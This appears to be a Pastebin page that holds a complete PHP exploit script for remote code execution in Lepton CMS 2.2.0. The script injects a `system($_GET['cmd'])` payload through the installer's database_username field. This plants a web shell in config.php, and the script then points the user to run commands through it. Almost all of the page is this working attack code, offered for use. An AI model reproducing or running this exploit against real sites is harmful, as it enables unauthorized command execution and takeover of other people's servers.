Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- Lepton CMS v2.2.0 - Remote Code Execution.
- Author: Hyp3rLinx
- Exploit Author: ~
- */
- $target = "http://127.0.0.1/lepton/install/save.php";
- $payload = "');?><?php echo '<pre>'; system(\$_GET['cmd']); die();?>";
- function curl_post($url, $post_data) {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_POST, 15);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1");
- $output = curl_exec($ch);
- $info = curl_getinfo($ch);
- curl_close($ch);
- return $info;
- }
- $da = curl_post($target, "guid=E610A7F2-5E4A-4571-9391-C947152FDFB0&website_title=abc&lepton_url=a&default_timezone_string=Europe/London&default_language=EN&operating_system=linux&database_host=127.0.0.1&database_username=$payload&database_password=abc&database_name=test&table_prefix=abc_&admin_username=admin&admin_email=admin@admin.com&admin_password=admin&admin_repassword=admin");
- if($da['http_code'] == 200) {
- echo "\nTada: Now visit /config.php?cmd= on target.\n";
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement